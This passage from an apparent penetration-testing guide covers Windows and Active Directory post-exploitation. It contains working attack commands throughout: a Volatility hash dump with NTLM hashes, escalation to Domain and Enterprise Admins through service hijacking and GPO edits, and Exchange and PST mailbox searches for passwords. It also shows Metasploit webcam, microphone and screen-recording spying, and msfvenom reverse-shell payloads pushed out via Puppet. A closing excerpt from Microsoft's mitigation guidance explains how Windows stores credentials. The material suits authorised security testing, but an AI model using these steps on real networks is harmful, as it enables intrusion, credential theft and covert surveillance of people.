0x87abe5c0 0x2802a5c0 \SystemRoot\System32\Config\DEFAULT
0x880b5008 0x231b7008 \SystemRoot\System32\Config\SECURITY
0x88164518 0x231cc518 \SystemRoot\System32\Config\SAM         # SAM
0x8bd019c8 0x24aec9c8 \Device\HarddiskVolume1\Boot\BCD
0x8bdd2008 0x24772008 \SystemRoot\System32\Config\SOFTWARE
0x8f5549c8 0x1f39e9c8 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0x90e83008 0x1f09f008 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0x955a9450 0x15468450 \??\C:\System Volume Information\Syscache.hve
0x988069c8 0x3aa329c8 \??\C:\Users\Fubar\ntuser.dat
</pre></div>
</div>
<p>All that remains now is to dump the hashes. To do this we need to pass volatility’s “hashdump” module the virtual memory offsets to the SYSTEM and SAM hives, which we have.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>root@Josjikawa:~/Tools/volatility# ./vol.py hashdump -f ../../Desktop/memory.dmp --profile=Win7SP1x86
sys-offset=0x87a1c008 sam-offset=0x88164518

Volatility Foundation Volatility Framework 2.4

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Fubar:1001:aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca:::
user1:1003:aad3b435b51404eeaad3b435b51404ee:7d65996108fccae892d38134a2310a4e:::
</pre></div>
</div>
<p>These Virtual Machine coredumps can be very large (1 GB+). If transferring them over the network is not an option you can always drop a copy of volatility on the target machine. Starting from version 2.4, volatility has binary packages for Windows, Linux and OSX.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span># Binary package on OSX 10.9.4

Avalon:Volatility-2.4 b33f$ ./volatility_2.4_x64 hashdump -f ../memory.dmp --profile=Win7SP1x86
sys-offset=0x87a1c008 sam-offset=0x88164518

Volatility Foundation Volatility Framework 2.4

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Fubar:1001:aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca:::
user1:1003:aad3b435b51404eeaad3b435b51404ee:7d65996108fccae892d38134a2310a4e:::
</pre></div>
</div>
</div>
<div class="section" id="active-directory-built-in-groups-self-elevation">
<h3>Active Directory Built-In Groups Self-Elevation<a class="headerlink" href="#active-directory-built-in-groups-self-elevation" title="Permalink to this headline">¶</a></h3>
<p>Generally when we talk about elevation using Built-In groups, it is considered to be a Local administrator to a higher priviledge user.</p>
<p>As mentioned in a <a class="reference external" href="https://adsecurity.org/?p=2362">ADSecurity Blog</a> there are a few built-in groups with the ability to logon to Domain Controllers by default:</p>
<ul class="simple">
<li>Enterprise Admins (member of the domain Administrators group in every domain in the forest)</li>
<li>Domain Admins (member of the domain Administrators group)</li>
<li>Administrators</li>
<li>Backup Operators</li>
<li>Server Operators</li>
<li>Account Operators</li>
<li>Print Operators (Currently has no obvious methods of elevating privileges)</li>
</ul>
<p>During a penetration testing engagement, this is probably the least used but one of the most effective ways of compromising the domain administrator. This has been shared by Jason Filley in his blog <a class="reference external" href="http://www.jasonfilley.com/activedirectorybuiltingroupsselfelevation.html">Active Directory Built-In Groups Self-Elevation</a></p>
<div class="section" id="built-in-administrators-to-ea-da">
<h4>Built-In Administrators to EA/DA<a class="headerlink" href="#built-in-administrators-to-ea-da" title="Permalink to this headline">¶</a></h4>
<p>If you have local administrator access to the domain controller, however do not have domain administrative access, the elevation is pretty simple. We need to only add the user we are utilizing into the domain admins group, utilizing a privileged command prompt and we are done.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>net group &quot;Domain Admins&quot; %username% /DOMAIN /ADD
</pre></div>
</div>
<p>Below are interesting cases on how one could utilize other Built-In Administrators to elevate to Enterprise Admin/ Domain Admin/ Built-In Administrator</p>
</div>
<div class="section" id="server-operators-elevate-to-ea-da-ba">
<h4>Server Operators elevate to EA/DA/BA<a class="headerlink" href="#server-operators-elevate-to-ea-da-ba" title="Permalink to this headline">¶</a></h4>
<p>Server Operators can modify the properties of certain services. The Computer Browser (“browser”) service is disabled by default and can easily be changed to run a command as System, which on DC’s has permissions to modify the built-in administrative groups.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\&gt;sc sdshow browser

D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;CCLCSWRPWPDTLOCRRC;;;SY)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
</pre></div>
</div>
<p>Here we see that Server Operators (“SO”) can write all properties (“WP”) for the browser service. Change the browser service properties to call “net group” instead.</p>
<blockquote>
<div><p>C:&gt;sc config browser binpath= “C:WindowsSystem32cmd.exe /c net group “Enterprise Admins” %username% /DOMAIN /ADD” type= “share” group= “” depend= “”
[SC] ChangeServiceConfig SUCCESS</p>
<p>C:&gt;sc start browser
[SC] StartService FAILED 1053:</p>
<p>The service did not respond to the start or control request in a timely fashion.</p>
</div></blockquote>
<p>Success: user added to “Enterprise Admins”</p>
</div>
<div class="section" id="account-operators-elevate-to-privileged-group-via-nested-group">
<h4>Account Operators elevate to privileged group via nested group<a class="headerlink" href="#account-operators-elevate-to-privileged-group-via-nested-group" title="Permalink to this headline">¶</a></h4>
<p>Account Operators have no permissions to modify the EA/DA/BA groups. However, if someone has been reckless enough to nest a group in a privileged group, Account Operators can still modify the nested group (by default). Suppose someone added the “NestedGroup” group as a member of the BA group:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>net group &quot;NestedGroup&quot; %username% /DOMAIN /ADD
</pre></div>
</div>
<p>Succeeds. The user is now a member of “NestedGroup” and by inclusion a member of BA.</p>
</div>
<div class="section" id="member-of-backup-operators-elevate-to-administrators">
<h4>Member of Backup Operators elevate to Administrators<a class="headerlink" href="#member-of-backup-operators-elevate-to-administrators" title="Permalink to this headline">¶</a></h4>
<p>The sole purpose of the BO group is to back up and restore domain controllers (or any part thereof), so that’s what we’ll do.</p>
<p>Get the SID of the target user account:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\&gt;dsquery user -name %username% | dsget user -sid
 sid
 S-1-5-21-2079967355-3169663337-3296943937-1111
dsget succeeded
</pre></div>
</div>
<p>As member of Backup Operators group, copy the Default Domain (or other applicable) GPO to a temporary location (e.g. your Desktop):</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\Windows\SYSVOL\domain\Policies\{*}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
</pre></div>
</div>
<p>Edit or add the Restricted Groups values, adding the SID of your account to the desired group (e.g. “S-1-5-32-544” == “Built-In Administrators”):</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>=======
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = &lt;etc etc etc&gt;,*S-1-5-21-2079967355-3169663337-3296943937-1111
</pre></div>
</div>
<p>Back the file up.
Restore the file and redirect it to the real SYSVOL location, overwriting the existing GPO.
Wait for GP refresh. Success.</p>
</div>
</div>
</div>
<div class="section" id="high-impact-exploitation">
<span id="high-impact-post-exploitation"></span><h2>High Impact Exploitation<a class="headerlink" href="#high-impact-exploitation" title="Permalink to this headline">¶</a></h2>
<p>This section mainly focuses on the Post-exploitation which can be show to the higher management for impact or showing risk such as reading emails ( either by reading .pst files or having access to the exchange server ), having access to the File-servers holding confidential data, able to access employees laptop/ desktop ( watch them via webcam/ listen to the surroundings using microphones). The assumption is we have already compromised the domain administrator of the Windows Domain.</p>
<div class="section" id="outlook-data-file-pst">
<h3>Outlook data file .pst<a class="headerlink" href="#outlook-data-file-pst" title="Permalink to this headline">¶</a></h3>
<p>A Personal Folders file (.pst) is an Outlook data file that stores your messages and other items on your computer.</p>
<p>readpst ( linux ) or <a class="reference external" href="https://github.com/srnsw/xena/tree/master/xena/dist/winx86">readpst.exe</a> can be used to read pst mailbox for passwords</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>ReadPST / LibPST v0.6.59
Little Endian implementation being used.
Usage: readpst [OPTIONS] {PST FILENAME}
OPTIONS:
       -V      - Version. Display program version
       -D      - Include deleted items in output
       -M      - Write emails in the MH (rfc822) format
       -S      - Separate. Write emails in the separate format
       -e      - As with -M, but include extensions on output files
       -h      - Help. This screen
       -o &lt;dirname&gt;    - Output directory to write files to. CWD is changed *after* opening pst file
       -q      - Quiet. Only print error messages
       -r      - Recursive. Output in a recursive format
       -t[eajc]        - Set the output type list. e = email, a = attachment, j = journal, c = contact
       -w      - Overwrite any output mbox files
</pre></div>
</div>
<p>Only one of -M -S -e -k -m -r should be specified</p>
<p>Once readpst has converted the contents of the .pst file to plaintext documents, we can search through them using the built-in “findstr” command.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>findstr /s /i /m “password” *.*

“/s” tells findstr to search through the current directory and subdirectories.
“/i” specifies that the search should be case insensitive.
“/m” tells findstr to output the file name rather than the file contents – if we output the contents, we may quickly be swamped with output that we’ll still have to sift through.  Depending on the amount of output, you may also quickly exceed cmd.exe’s limits.
*.*, of course, means that we’re searching through files of any name and any type.
</pre></div>
</div>
<p>The above has been taken from the <a class="reference external" href="https://warroom.securestate.com/pillaging-pst-files/">Pillaging .pst Files</a></p>
</div>
<div class="section" id="pillage-exchange">
<h3>Pillage Exchange<a class="headerlink" href="#pillage-exchange" title="Permalink to this headline">¶</a></h3>
<p>This is applicable in a Microsoft environment that uses Outlook but does not back up email to .pst files.</p>
<p>The assumption is that we have already compromised the Exchange Administrator account on the Exchange server.  We’ll use two techniques to search through mailboxes of interest.  The first is to give ourselves full access to the targeted user’s mailbox; the second is to use built-in management features to search through a mailbox of our choosing.</p>
<div class="section" id="full-access-to-the-targeted-users-mailbox">
<h4>Full access to the targeted user’s mailbox<a class="headerlink" href="#full-access-to-the-targeted-users-mailbox" title="Permalink to this headline">¶</a></h4>
<ul class="simple">
<li>Step 1: Add a Mailbox - Create a new mailbox by using web-based Exchange Admin Center (EAC). The “mailboxes” section allows us to add a new user mailbox.  The user receiving the mailbox can come from the list of Active Directory users, or the Administrator can create a new user.</li>
<li>Step 2: Mailbox Delegation - Once our new user’s mailbox is created, we can give ourselves full access to our target user mailbox. This can be done by using targeted user mailbox account options. Go to the account settings of targeted user mailbox, select the edit option, select “mailbox delegation,” and add our new user to the “Full Access” section. Once that’s complete, we can log in to our recently created mailbox with the username and password we set, then open another mailbox without being required to enter any credentials</li>
</ul>
<p>However, when we interact with their mailbox, it’s as if they are doing it, so emails previously marked as unread will be marked as read after being opened.</p>
</div>
<div class="section" id="search-mailbox-cmdlet">
<h4>Search-Mailbox cmdlet<a class="headerlink" href="#search-mailbox-cmdlet" title="Permalink to this headline">¶</a></h4>
<ul class="simple">
<li>If we have access to the exchange server and Exchange Management Tools are installed on a machine, they include the Exchange Management Shell, which is a version of Powershell with specific features for administering exchange.  “Search-Mailbox,” allow us to make specific search queries on mailboxes of interest without manually giving ourselves full-access and logging in.</li>
<li>However, Search-Mailbox belongs to administrators with the “Discovery Management” role.  We have to add the compromised account to the members of this role by visiting EAC and going to “permissions,” “admin roles” and editing the “Discovery Management” to add the account we compromised.</li>
<li>Search-Mailbox Syntax</li>
</ul>
<blockquote>
<div><div class="highlight-None notranslate"><div class="highlight"><pre><span></span>Search-Mailbox -Identity “First Last” -SearchQuery “String” -TargetMailbox “DiscoveryMailbox” -TargetFolder “Folder” -LogLevel Full

Identity is the Active Directory username
SearchQuery is the string of text we’re looking for,
TargetMailbox is the mailbox where emails containing that string will be sent (hence the need to control a mailbox),
TargetFolder is the folder in that mailbox where they’ll go
</pre></div>
</div>
</div></blockquote>
<p>Example:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>Search-Mailbox -Identity “Targeted User” -SearchQuery “Password” -TargetMailbox “NewMailboxCreated” -TargetFolder “Inbox” -LogLevel Full
</pre></div>
</div>
<p>Now we simply pop back over to the mailbox of the user we created and inspect the newly arrived email(s):</p>
<p>The above has been taken from <a class="reference external" href="https://warroom.securestate.com/pillage-exchange/">Pillage Exchange</a></p>
</div>
</div>
<div class="section" id="file-servers">
<h3>File Servers<a class="headerlink" href="#file-servers" title="Permalink to this headline">¶</a></h3>
<p>We can get a list of file servers in the windows active directory by using Powersploit-Powerview-Get-NetFileServer funtion. Once we have the file server list, we can view the file server contents utilizing Windows explorer. We can also mount the file server using mount.cifs</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>mount.cifs //{ip address}/{dir} /mnt/mountdirectory --verbose -o &quot;username=foo,password=bar,domain=domainname,ro&quot;
</pre></div>
</div>
</div>
<div class="section" id="active-directory-database-credentials">
<h3>Active Directory Database Credentials<a class="headerlink" href="#active-directory-database-credentials" title="Permalink to this headline">¶</a></h3>
<p>Sean Metcalf has written a brilliant blog <a class="reference external" href="https://adsecurity.org/?p=2398">How Attackers Dump Active Directory Database Credentials</a></p>
<p>The above blog covers:</p>
<ul class="simple">
<li>Grabbing the ntds.dit file locally on the DC using NTDSUtil’s Create IFM</li>
<li>Pulling the ntds.dit remotely using VSS shadow copy</li>
<li>Pulling the ntds.dit remotely using PowerSploit’s Invoke-NinjaCopy (requires PowerShell remoting is enabled on target DC).</li>
<li>Dumping Active Directory credentials locally using Mimikatz (on the DC).</li>
<li>Dumping Active Directory credentials locally using Invoke-Mimikatz (on the DC).</li>
<li>Dumping Active Directory credentials remotely using Invoke-Mimikatz.</li>
<li>Dumping Active Directory credentials remotely using Mimikatz’s DCSync.</li>
</ul>
<p>The methods covered above require elevated rights since they involve connecting to the Domain Controller to dump credentials.</p>
<p>The statement “We do have all the users password hashes of your organization and X number of passwords were cracked in X number of days” make a good impact for your client.</p>
</div>
<div class="section" id="c-level-executive-webcam-microphone-user-activity-recording">
<h3>C-Level Executive - Webcam, Microphone, User Activity Recording<a class="headerlink" href="#c-level-executive-webcam-microphone-user-activity-recording" title="Permalink to this headline">¶</a></h3>
<p>Metasploit provide a post exploitation module for taking snapshots from webcam and recording sounds from microphone. Imagine, the impact of informing the client that we can view a person live-feed or record sounds from a meeting room without being present in the same room. Maybe in the meeting there were discussing about passwords, company secrets, operations, future plannings, spendings, etc.</p>
<div class="section" id="webcam">
<h4>Webcam<a class="headerlink" href="#webcam" title="Permalink to this headline">¶</a></h4>
<p>This module will allow the user to detect installed webcams (with the LIST action) or take a snapshot (with the SNAPSHOT) action.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>msf &gt; use post/windows/manage/webcam
msf post(webcam) &gt; info

Name: Windows Manage Webcam
Module: post/windows/manage/webcam

Available actions:
Name      Description
----      -----------
LIST      Show a list of webcams
SNAPSHOT  Take a snapshot with the webcam

Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
INDEX    1                no        The index of the webcam to use
QUALITY  50               no        The JPEG image quality
SESSION                   yes       The session to run this module on.
</pre></div>
</div>
</div>
<div class="section" id="record-mic">
<h4>Record_Mic<a class="headerlink" href="#record-mic" title="Permalink to this headline">¶</a></h4>
<p>This module will enable and record your target’s microphone.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>msf post(webcam) &gt; use post/multi/manage/record_mic
msf post(record_mic) &gt; info

Name: Multi Manage Record Microphone
Module: post/multi/manage/record_mic

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
DURATION  5                no        Number of seconds to record
SESSION                    yes       The session to run this module on.
</pre></div>
</div>
<p>Sinn3r has written a blog <a class="reference external" href="https://community.rapid7.com/community/metasploit/blog/2013/01/23/the-forgotten-spying-feature-metasploits-mic-recording-command">The forgotten spying feature: Metasploit’s Mic Recording Command</a> which can provide more information. Once, we have recorded the meetings, the sound WAV files can be converted to text using speech to text api.</p>
</div>
<div class="section" id="user-activity">
<h4>User Activity<a class="headerlink" href="#user-activity" title="Permalink to this headline">¶</a></h4>
<p>If we have a meterpreter from a windows machine, we can use Problem Steps Recorder ( PSR )(Microsoft In-built tool) to captures screenshots and text descriptions of what a user is doing on their system.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>psr.exe [/start |/stop][/output &lt;fullfilepath&gt;] [/sc (0|1)] [/maxsc &lt;value&gt;]
[/sketch (0|1)] [/slides (0|1)] [/gui (0|1)]
[/arcetl (0|1)] [/arcxml (0|1)] [/arcmht (0|1)]
[/stopevent &lt;eventname&gt;] [/maxlogsize &lt;value&gt;] [/recordpid &lt;pid&gt;]

/start Start Recording. (Outputpath flag SHOULD be specified)
/stop Stop Recording.
/sc Capture screenshots for recorded steps.
/maxsc Maximum number of recent screen captures.
/maxlogsize Maximum log file size (in MB) before wrapping occurs.
/gui Display control GUI.
/arcetl Include raw ETW file in archive output.
/arcxml Include MHT file in archive output.
/recordpid Record all actions associated with given PID.
/sketch Sketch UI if no screenshot was saved.
/slides Create slide show HTML pages.
/output Store output of record session in given path.
/stopevent Event to signal after output files are generated.
</pre></div>
</div>
<p>Once, we have a meterpreter, we can use shell to execute it</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>psr.exe /start /gui 0 /output C:\Users\Dan\Desktop\cool.zip;
Start-Sleep -s 20;
psr.exe /stop;
</pre></div>
</div>
<p>Refer <a class="reference external" href="https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-remotely-with-metasploit/">Using Problem Steps Recorder (PSR) Remotely with Metasploit</a></p>
</div>
</div>
<div class="section" id="hypervisor">
<h3>Hypervisor<a class="headerlink" href="#hypervisor" title="Permalink to this headline">¶</a></h3>
<p>A hypervisor or virtual machine monitor (VMM) is computer software, firmware or hardware that creates and runs virtual machines. Many of times, we would find that the client has deployed a common 4-tier architecture such as development, testing, staging, production (DEV, TEST, STAGING, PROD) on to hypervisor i.e. each environment on one hypervisor. If you compromise the Hypervisor ( mostly attached to Windows Domain ), you would end up compromising whole ( DEV/ TEST/ STAGING and PROD ) environment. Once, we compromised a client SAP environment in such manner.</p>
</div>
<div class="section" id="targeted-hunting">
<h3>Targeted Hunting<a class="headerlink" href="#targeted-hunting" title="Permalink to this headline">¶</a></h3>
<p>As we already have domain administrator privileges, we own the network and possibly have access to every machine. However, we will cover a non-traditional way to strategically target and compromise computers.</p>
<div class="section" id="microsofts-system-center-configuration-manager">
<h4>Microsoft’s System Center Configuration Manager<a class="headerlink" href="#microsofts-system-center-configuration-manager" title="Permalink to this headline">¶</a></h4>
<p>SCCM is a platform that allows for an enterprise to package and deploy operating systems, software, and software updates. It allows for IT staff to script and push out installations to clients in an automated manner. If you can gain access to SCCM, it makes for a great attack platform. It heavily integrates Windows PowerShell, has excellent network visibility, and has a number of SCCM clients as SYSTEM just waiting to execute your code as SYSTEM.</p>
<p>Enigma has written a awesome blog <a class="reference external" href="https://enigma0x3.net/2015/10/27/targeted-workstation-compromise-with-sccm/">Target workstation compromise with SCCM</a></p>
</div>
<div class="section" id="microsoft-system-center-operations-manager">
<h4>Microsoft System Center Operations Manager<a class="headerlink" href="#microsoft-system-center-operations-manager" title="Permalink to this headline">¶</a></h4>
<p>System Center Operations Manager (SCOM) is a cross-platform data center monitoring system for operating systems and hypervisors. It uses a single interface that shows state, health and performance information of computer systems. It also provides alerts generated according to some availability, performance, configuration or security situation being identified. It works with Microsoft Windows Server and Unix-based hosts.</p>
<p>SCOM also allows to monitor health of the system and provide powershell interface to the machine or provide an ability to execute a script on a particular machine.</p>
</div>
<div class="section" id="puppet">
<h4>Puppet<a class="headerlink" href="#puppet" title="Permalink to this headline">¶</a></h4>
<p>Puppet is an open-source software configuration management tool. It runs on many Unix-like systems as well as on Microsoft Windows. It was created to easily automate repetitive and error-prone system administration tasks. Puppet’s easy-to-read declarative language allows you to declare how your systems should be configured to do their jobs.</p>
<p>However, if an organization is utilizing puppet to control it servers/ workstations and we have compromised puppet server. We can just create a metasploit meterpreter based on the target operating system ( Windows/ Linux )
using msfvenom.</p>
<ul class="simple">
<li>Linux</li>
</ul>
<blockquote>
<div><div class="highlight-None notranslate"><div class="highlight"><pre><span></span>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f elf &gt; shell.elf
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Windows</li>
</ul>
<blockquote>
<div><div class="highlight-None notranslate"><div class="highlight"><pre><span></span>msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f exe &gt; shell.exe
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Mac</li>
</ul>
<blockquote>
<div><div class="highlight-None notranslate"><div class="highlight"><pre><span></span>msfvenom -p osx/x86/shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f macho &gt; shell.macho
</pre></div>
</div>
</div></blockquote>
<p>Create a module in puppet to include this payload using file resource and store in on the targeted machine. Utilizing exec resource, execute the payload and we would receive the meterpreter on the listener.</p>
<p>Tanoy Bose has written the blog on <a class="reference external" href="http://n0tty.github.io/2017/06/11/Enterprise-Offense-IT-Operations-Part-1/">Enterprise Offense: IT Operations [Part 1] - Post-Exploitation of Puppet and Ansible Servers</a></p>
<div class="admonition-todo admonition" id="index-0">
<p class="first admonition-title">Todo</p>
<ul class="last simple">
<li>The Email- Mailbox Post exploitation – Also the check if someone has exploited this (check logs) – which is also connected to Domain?</li>
<li>How does google email works?</li>
<li>File Hunting – Better ways!! Faster ways!!</li>
</ul>
</div>
</div>
<div class="section" id="credmap-the-credential-mapper">
<h4>Credmap: The credential Mapper<a class="headerlink" href="#credmap-the-credential-mapper" title="Permalink to this headline">¶</a></h4>
<p><a class="reference external" href="https://github.com/lightos/credmap">credmap</a>. is open source tool created by <a class="reference external" href="https://github.com/lightos">Roberto Salgado</a> to check for credential reuse. It is capable of testing the supplied user credentials on several websites to test if the password has been reused or not. This tool can be of great advantage to check the validation of the gathered credentials on other social media sites as well.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>Usage: credmap.py --email EMAIL | --user USER | --load LIST [options]

Options:
  -h/--help             show this help message and exit
  -v/--verbose          display extra output information
  -u/--username=USER..  set the username to test with
  -p/--password=PASS..  set the password to test with
  -e/--email=EMAIL      set an email to test with
  -l/--load=LOAD_FILE   load list of credentials in format USER:PASSWORD
  -f/--format=CRED_F..  format to use when reading from file (e.g. u|e:p)
  -x/--exclude=EXCLUDE  exclude sites from testing
  -o/--only=ONLY        test only listed sites
  -s/--safe-urls        only test sites that use HTTPS
  -i/--ignore-proxy     ignore system default HTTP proxy
  --proxy               set proxy (e.g. &quot;socks5://192.168.1.2:9050&quot;)
  --list                list available sites to test with
  --update              update from the official git repository

Examples:
./credmap.py --username janedoe --email janedoe@email.com
./credmap.py -u johndoe -e johndoe@email.com --exclude &quot;github.com, live.com&quot;
./credmap.py -u johndoe -p abc123 -vvv --only &quot;linkedin.com, facebook.com&quot;
./credmap.py -e janedoe@example.com --verbose --proxy &quot;https://127.0.0.1:8080&quot;
./credmap.py --load creds.txt --format &quot;e.u.p&quot;
./credmap.py -l creds.txt -f &quot;u|e:p&quot;
./credmap.py -l creds.txt
./credmap.py --list
</pre></div>
</div>
</div>
</div>
</div>
<div class="section" id="appendix-i-windows-credentials">
<span id="a1-windows-credentials"></span><h2>Appendix-I : Windows Credentials<a class="headerlink" href="#appendix-i-windows-credentials" title="Permalink to this headline">¶</a></h2>
<p>In this section, we have explained the concepts about authentication, credentials and authenticators, credential storage, authentication protocols, logon types. The below has been directly taken from the <a class="reference external" href="https://www.microsoft.com/en-in/download/details.aspx?id=36036">Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft, Version 1 and 2</a></p>
<div class="section" id="terminology-authentication-credentials-and-authenticators">
<h3>Terminology: authentication, credentials, and authenticators<a class="headerlink" href="#terminology-authentication-credentials-and-authenticators" title="Permalink to this headline">¶</a></h3>
<p>When a user wants to access a computing resource, they must provide information that identifies who they are, their identity, and proof of this identity in the form of secret information that only they are supposed to know. This proof of identity is called an <strong>authenticator</strong>. An authenticator can take various forms, depending on the authentication protocol and method. The combination of an <strong>identity</strong> and an <strong>authenticator</strong> is called an <strong>authentication credential or credential</strong>. The process of creation, submission, and verification of credentials is described simply as <strong>authentication</strong>, which is implemented through various authentication protocols, such as NTLM and Kerberos authentication. Authentication establishes the identity of the user, but not necessarily the user’s permission to access or change a computing resource, which is handled by a separate authorization process.</p>
</div>
<div class="section" id="credentials-in-windows-operating-systems">
<h3>Credentials in Windows operating systems<a class="headerlink" href="#credentials-in-windows-operating-systems" title="Permalink to this headline">¶</a></h3>
<p>Credentials are typically created or converted to a form required by the authentication protocols available on a computer. Credentials may be stored in LSASS process memory for use by the account during a session. Credentials must also be stored on disk in authoritative databases, such as the SAM database and the Active Directory database.</p>
<div class="section" id="identities-usernames">
<h4>Identities - usernames<a class="headerlink" href="#identities-usernames" title="Permalink to this headline">¶</a></h4>
<p>In Windows operating systems, a user’s identity takes the form of the account’s username, either the “user name” (SAM Account Name) or the User Principal Name (UPN).</p>
</div>
<div class="section" id="windows-authenticators">
<h4>Windows authenticators<a class="headerlink" href="#windows-authenticators" title="Permalink to this headline">¶</a></h4>
<p>Windows Credential Types, lists the credential authenticator types in Windows operating systems and provides a brief description of each type.</p>
<table border="1" class="docutils">
<colgroup>
<col width="16%" />
<col width="84%" />
</colgroup>
<thead valign="bottom">
<tr class="row-odd"><th class="head">Credential Type</th>
<th class="head">Description</th>
</tr>
</thead>
<tbody valign="top">
<tr class="row-even"><td>Plaintext credentials</td>
<td>When a user logs on to a Windows computer and provides a username and credentials, such as a password or PIN, the
information is provided to the computer in plaintext. This plaintext password is used to authenticate the user’s
identity by converting it into the form required by the authentication protocol. Current versions of Windows also
retain an encrypted copy of this password that can be decrypted back to plaintext for use with authentication methods
such as Digest authentication.</td>
</tr>
<tr class="row-odd"><td>NT hash</td>
<td>The NT hash of the password is calculated using an unsalted MD4 hash algorithm. MD4 is a cryptographic one-way
function that produces a mathematical representation of a password. This hashing function is designed to always
produce the same result from the same password input, and to minimize collisions where two different passwords can
produce the same result. This hash is always the same length and cannot be directly decrypted to reveal the plaintext
password. Because the NT hash only changes when the password changes, an NT hash is valid for authentication until a
user’s password is changed. This also means that if two accounts use an identical password, they will also have an
identical NT password hash.</td>
</tr>
<tr class="row-even"><td>LM Hash</td>
<td><p class="first">LAN Manager (LM) hashes are derived from the user password. Legacy support for LM hashes and the LAN Manager
authentication protocol remains in the Windows NTLM protocol suite, but default configurations and Microsoft security
guidance have discouraged their use for more than a decade. LM hashes have a number of challenges that make them less
secure and more valuable to attackers if stolen:
- hashes required a password to be less than 15 characters long and contain only ASCII characters.
- LM Hashes also do not differentiate between uppercase and lowercase letters.</p>
<p class="last">Techniques to obtain the plaintext value from a LM hash with relatively low effort have been available for a number of
years, so the loss of a LM hash should be considered nearly equivalent to the loss of plaintext password.</p>
</td>
</tr>
<tr class="row-odd"><td>Windows logon cached
password verifiers</td>
<td>These verifiers are stored in the registry (HKLMSecurity) on the local computer and provide validation of a domain
user’s credentials when the computer cannot connect to Active Directory during a user logon. These are not
credentials, as they cannot be presented to another computer for authentication, and they can only be used to locally
verify a credential.</td>
</tr>
</tbody>
</table>
</div>
<div class="section" id="credential-storage">
<h4>Credential Storage<a class="headerlink" href="#credential-storage" title="Permalink to this headline">¶</a></h4>
<p>Credential Storage, lists the types of credential storage locations available on the Windows operating system.</p>
<table border="1" class="docutils">
<colgroup>
<col width="16%" />
<col width="84%" />
</colgroup>
<thead valign="bottom">
<tr class="row-odd"><th class="head">Credential sources</th>
<th class="head">Description</th>
</tr>
</thead>
<tbody valign="top">
<tr class="row-even"><td>Security Accounts
Manager (SAM)
database</td>
<td><p class="first">The SAM database is stored as a file on the local disk, and is the authoritative credential store for local accounts
on each Windows computer. This database contains all the credentials that are local to that specific computer
including the built-in local Administrator account and any other local accounts for that computer.</p>
<p class="last">The SAM database stores information on each account, including the username and the NT password hash. By default,
the SAM database does not store LM hashes on current versions of Windows. It is important to note that no password is
ever stored in a SAM database, only the password hashes.</p>
</td>
</tr>
<tr class="row-odd"><td>Local System Security
Authority Subsystem
( LSASS ) process
memory</td>
<td><p class="first">The Local Security Authority (LSA) stores credentials in memory on behalf of users with active Windows sessions. This
allows users to seamlessly access network resources, such as file shares, Exchange mailboxes, and SharePoint sites,
without reentering their credentials for each remote service. LSA may store credentials in multiple forms including:
- Reversibly encrypted plaintext
- Kerberos tickets (TGTs, service tickets)
- NT hash
- LM hash</p>
<p class="last">If the user logs on to Windows using a smartcard, LSA will not store a plaintext password, but it will store the
corresponding NT hash value for the account and the plaintext PIN for the smartcard.</p>
</td>
</tr>
<tr class="row-even"><td>LSA secrets on disk</td>
<td><p class="first">A Local Security Authority (LSA) secret is a secret piece of data that is accessible only to SYSTEM account processes.
Some of these secrets are credentials that must persist after reboot and are stored in encrypted form on disk.
Credentials stored as LSA secrets on disk may include:
- Account password for the computer’s Active Directory account.
- Account passwords for Windows services configured on the computer.
- Account passwords for configured scheduled tasks.
- Account passwords for IIS application pools and websites.
- An attack tool running as an account with administrative privileges on the computer can exploit those privileges to</p>
<blockquote class="last">
<div>extract these LSA secrets.</div></blockquote>
</td>
</tr>
<tr class="row-odd"><td>Domain Active
Directory Database
( NTDS.DIT )</td>
